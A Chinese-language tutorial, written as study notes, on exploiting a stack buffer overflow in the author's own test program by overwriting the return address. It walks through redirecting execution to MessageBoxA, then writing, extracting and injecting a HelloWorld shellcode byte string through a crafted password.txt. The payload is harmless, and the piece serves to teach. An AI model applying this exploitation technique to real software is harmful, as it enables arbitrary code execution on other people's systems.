溢出漏洞原理及利用
本文是作者学习过程的笔记整理而来的,如有错误,还请见谅!
接上一篇
利用溢出执行系统的MessageBox
既然是函数的返回地址被淹没了,导致执行返回地址处的代码的时候出错,我们也看到返回地址处是我们在password.txt中输入的数据当成了地址,那么我们是不是可以控制这个数据,让它返回的时候返回我们自己想要执行地方.
简单测试(弹出系统MessageBox):
因为之前已经想到了要使用MessageBox,所以其实代码中早就加入了
if (NULL == (fp = fopen("password.txt", "rb")))
{
MessageBoxA(NULL, "Open File Fail", "error", NULL);
exit(0);
}
这样是为了测试跟演示方便(不需要在加载其dll了).
好,我们先找到程序中MessageBoxA函数的地址
使用x64dbg打开源程序,ctrl+G输入表达式MessageBoxA确定,
如下,找到地址0x7666F8B0
使用010Editor以十六进制的方式打开password.txt文件,找到函数返回地址处
更改成MessageBoxA的地址(0x7666F8B0):
那么MessageBoxA还有4个参数呢,把它们放在哪里呢?
根据函数栈中的结构,我们知道参数是在返回地址的高地址处,这个源程序也把文件中的数据顺序复制到栈中了.所以我们直接在函数返回值后边”压栈”4个参数0.
保存password.txt文件,再次运行源程序测试.
弹出了对话框,测试成功.
利用溢出执行自己的代码
构造最简单的HelloWorld版本Shellcode
经过测试,我们知道利用这个函数的返回地址处,可以执行其他代码.
我们现在想的就是,自己写一段代码,然后把代码执行首地址填到溢出的地址处,测试能否执行.
为了生成最优的二进制代码,我们使用汇编语言编写主要部分,然后转化成OPCode测试.
主要功能:弹出一个带HelloWorld的MessageBox,然后防止程序错误,调用ExitProcess结束进程.
我们使用到的函数地址,依然是写死的地址.查找地址与上边类似
使用x64dbg打开源程序,ctrl+G输入表达式,如下,找到地址
MessageBoxA:0x7666F8B0
ExitProcess:0x74863BC0
写代码:
// shellcode_helloworld.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <windows.h>
int main()
{
LoadLibraryA("user32.dll");
_asm
{
sub esp, 0x20;
jmp tag_shellcode
//MessageBoxA
_asm _emit(0xB0) _asm _emit(0xF8) _asm _emit(0x66) _asm _emit(0x76)
//ExitProcess
_asm _emit(0xC0) _asm _emit(0x3B) _asm _emit(0x86) _asm _emit(0x74)
//HelloWorld
_asm _emit(0x48) _asm _emit(0x65) _asm _emit(0x6C) _asm _emit(0x6C)
_asm _emit(0x6F) _asm _emit(0x20) _asm _emit(0x57) _asm _emit(0x6F)
_asm _emit(0x72) _asm _emit(0x6C) _asm _emit(0x64) _asm _emit(0x21)
_asm _emit(0x00)
tag_shellcode:
call tag_Next;
tag_Next:
pop esi; //call pop == GetPC
xor edx, edx; //edx清零
lea edi, [esi - 0x12]; //helloworld字符串地址
mov eax, [esi - 0x1A]; //MessageBoxA
push edx; //参数0
push edi; //参数helloworld
push edi; //参数helloworld
push edx; //参数0
call eax; //MessageBoxA
mov eax, [esi - 0x16]; //ExitProcess
push edx; //参数0
call eax; //ExitProcess
}
return 0;
}
生成可执行程序,测试运行,没有问题.
现在代码和程序都有了,我们怎么把它们转成二进制代码呢.
当然是用神器x64dbg了.
把程序拖入x64dbg,找到main函数,找到汇编代码处:
注意,是第二个FF,D0处
在数据区选中右键复制数据,选择C样式shellcode字符串:
这样我们就得到了这个二进制字符串,为了之后工作无误,先测试一下复制的字符串是不是可以用
再次写代码:
// shellcode_helloworld.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
char bShellcode[] = "\x83\xEC\x20\xEB\x15\xB0\xF8\x66\x76\xC0\x3B\x86\x74\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00\xE8\x00\x00\x00\x00\x5E\x33\xD2\x8D\x7E\xEE\x8B\x46\xE6\x52\x57\x57\x52\xFF\xD0\x8B\x46\xEA\x52\xFF\xD0";
int main()
{
_asm
{
lea eax, bShellcode;
push eax;
ret;
}
MessageBoxA(0, 0, 0, 0);//为了加载dll
return 0;
}
生成执行文件,运行效果相同
运行最简单的HelloWorld版本Shellcode
经过以上,最后的二进制字符串就是我们构造的最简单的Shellcode了
现在我们让带有溢出漏洞的源程序执行我们构造的代码.
把二进制代码复制到password.txt中,返回地址写成:0019FD28
鼠标放在要复制的开始处,选择编辑菜单->十六进制复制
保存文件.运行源程序,成功!